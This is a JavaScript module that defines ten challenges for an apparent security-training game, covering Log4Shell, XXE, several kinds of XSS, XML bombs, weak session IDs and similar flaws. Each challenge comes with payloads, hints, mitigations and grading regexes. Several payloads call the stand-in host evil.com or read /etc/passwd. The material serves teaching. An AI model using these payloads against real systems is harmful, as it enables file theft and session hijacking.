const { registerBatch } = require('./generator');

registerBatch([
    {
        id: "toxic-dependencies",
        name: "Toxic Dependencies",
        category: "System",
        theory: "Toxic configurations or dependencies happen when software relies on third-party integrations or open-source packages that have known, often critical, unpatched vulnerabilities (e.g., Log4Shell in log4j).",
        exploit: "Inject a payload targeting a known vulnerability inside an open-source dependency the project relies on.",
        hint: "Send the JNDI Log4j injection payload: `${jndi:ldap://evil.com/a}`.",
        lowPayload: "${jndi:ldap://evil.com/a}",
        medPayload: "${jndi:rmi://evil/b}",
        mitigations: ["Implement Software Composition Analysis (SCA) to verify dependency bill-of-materials.", "Upgrade severely outdated packages."],
        weakRegex: "/rmi/i",
        successRegex: "/\\$\\{jndi:ldap/i"
    },
    {
        id: "unencrypted-comm",
        name: "Unencrypted Communication",
        category: "Network",
        theory: "Sending sensitive data (passwords, tokens, PII) over unencrypted channels like HTTP or unsecure FTP means the data is readable in plain text by anyone monitoring the network.",
        exploit: "Capture network traffic to extract plaintext sensitive information.",
        hint: "Provide the phrase 'Wireshark Export: AdminPassword123' to simulate sniffing.",
        lowPayload: "Sniffed: Password",
        medPayload: "Extrapolated cleartext JWT",
        mitigations: ["Enforce TLS encryption intrinsically.", "Never allow fallback endpoints without TLS active."],
        weakRegex: "/JWT/i",
        successRegex: "/(Sniffed|Password)/i"
    },
    {
        id: "user-enumeration",
        name: "User Enumeration",
        category: "Web",
        theory: "Differences in application responses (e.g., 'User not found' vs 'Invalid password') or response times allow an attacker to guess valid usernames.",
        exploit: "Observe backend responses to identify a valid user id.",
        hint: "Send 'Guess: admin' expecting a 'Password invalid' specific response.",
        lowPayload: "Guess: admin",
        medPayload: "Timing variance exploit",
        mitigations: ["Use generic error messaging like 'Login failed'.", "Implement strict rate-limiting on authentication endpoints."],
        weakRegex: "/Timing/i",
        successRegex: "/(Guess: |admin)/i"
    },
    {
        id: "weak-session-ids",
        name: "Weak Session IDs",
        category: "Cryptography",
        theory: "Session IDs that are predictable (e.g., sequential numbers or base64-encoded usernames) can be guessed, enabling session hijacking without finding other exploits.",
        exploit: "Predict the session token of the admin by analyzing the sequence.",
        hint: "Send an ID that comes exactly after 'Session=100', like 'Session=101'.",
        lowPayload: "Session=101",
        medPayload: "Base64 decode bypass",
        mitigations: ["Ensure IDs are cryptographically random and at least 128-bits.", "Use well-established web frameworks for session management natively."],
        weakRegex: "/Base64/i",
        successRegex: "/(101|Session)/i"
    },
    {
        id: "xml-bombs",
        name: "XML Bombs (Billion Laughs)",
        category: "Web",
        theory: "An XML Bomb, often called the Billion Laughs attack, is a tiny XML file containing highly nested entity expansions that overwhelm server memory during parsing, resulting in DoS.",
        exploit: "Submit a highly nested entity expansion XML payload.",
        hint: "Submit the standard 'lolz' XML bomb reference `&lol9;`.",
        lowPayload: "&lol9;",
        medPayload: "Recursive DTD Entity loop",
        mitigations: ["Configure XML parsers to refuse entity expansion entirely.", "Set maximum memory allocation limits on parser buffers."],
        weakRegex: "/DTD/i",
        successRegex: "/(\\&lol9;)/i"
    },
    {
        id: "xxe",
        name: "XML External Entities (XXE)",
        category: "Web",
        theory: "XXE occurs when weakly configured XML parsers process 'external entities' referenced within a Document Type Definition (DTD). Attackers can exfiltrate local files like /etc/passwd.",
        exploit: "Form an XML DOCTYPE declaring a SYSTEM entity pointing to /etc/passwd.",
        hint: "Provide an entity `<!ENTITY xxe SYSTEM \"file:///etc/passwd\">`.",
        lowPayload: "<!ENTITY xxe SYSTEM 'file:///etc/passwd'>",
        medPayload: "<!ENTITY xxe SYSTEM 'php://filter/read=convert.base64-encode/resource=index.php'>",
        mitigations: ["Disable External Entity Resolution (DTD) completely in the XML parser.", "Use JSON or simpler data formats instead."],
        weakRegex: "/php:\\/\\/filter/i",
        successRegex: "/(SYSTEM|file:\\/\\/\\/etc)/i"
    },
    {
        id: "dom-xss",
        name: "DOM-based XSS",
        category: "Web",
        theory: "DOM-based Cross-Site Scripting occurs within the client's browser. The malicious payload is never sent to the server; instead, the frontend JavaScript consumes it unsafely (e.g. from `window.location.hash`).",
        exploit: "Provide a payload utilizing the DOM fragment # bypassing server evaluation.",
        hint: "Send `#<img src=x onerror=alert(1)>`.",
        lowPayload: "#<script>alert(1)</script>",
        medPayload: "#javascript:alert(1) via anchor tag",
        mitigations: ["Avoid rendering raw elements from sources like `location.hash` or `document.referrer`.", "Use `textContent` instead of `innerHTML`."],
        weakRegex: "/javascript:/i",
        successRegex: "/(alert|#<script|#<img)/i"
    },
    {
        id: "reflected-xss",
        name: "Reflected XSS",
        category: "Web",
        theory: "Reflected Cross-Site Scripting immediately echoes unsanitized user input back into the page. The attacker must trick a victim into clicking a crafted URL containing the payload.",
        exploit: "Send a payload via a GET query parameter that reflects directly into the HTML response.",
        hint: "Send `?search=<script>alert(1)</script>`.",
        lowPayload: "?search=<script>alert(1)</script>",
        medPayload: "?search=<svg/onload=alert(1)>",
        mitigations: ["Implement context-aware output encoding (HTML Entity Encoding).", "Deploy a strict Content-Security-Policy."],
        weakRegex: "/<svg/i",
        successRegex: "/(search=.*<script|alert)/i"
    },
    {
        id: "stored-xss",
        name: "Stored Cross-Site Scripting",
        category: "Web",
        theory: "Stored XSS saves the malicious script on the target application's database (like a forum post). Any user visiting that page subsequently executes the payload without further trickery.",
        exploit: "Store an attack payload inside a persistent database record like a comment.",
        hint: "Send `Comment: <script src='http://evil.com/hook.js'></script>`.",
        lowPayload: "Comment: <script>alert(1)</script>",
        medPayload: "Comment: <img src='x' onerror='alert(1)'>",
        mitigations: ["Sanitize user inputs and encode immediately on render.", "Ensure robust DB constraints rejecting raw tags."],
        weakRegex: "/onerror/i",
        successRegex: "/(Comment:.*<script|hook)/i"
    },
    {
        id: "cross-site-script-inclusion",
        name: "Cross-Site Script Inclusion (XSSI)",
        category: "Web",
        theory: "XSSI leaks sensitive data when an attacker uses the `<script>` tag to dynamically load a confidential API endpoint from a cross-origin site, bypassing Same-Origin Policy since scripts inherently bypass SOP.",
        exploit: "Request an authenticated JSON endpoint via a script element.",
        hint: "Send `<script src='https://bank.com/api/userINFO'></script>`.",
        lowPayload: "<script src='api/userINFO'></script>",
        medPayload: "Prototype hijacking over script inclusion.",
        mitigations: ["Use unguessable CSRF-style tokens for APIs.", "Prefix JSON files with parser-breaking junk like `)]}',\\n`."],
        weakRegex: "/Prototype/i",
        successRegex: "/(<script.*src=.*userINFO)/i"
    }
]);
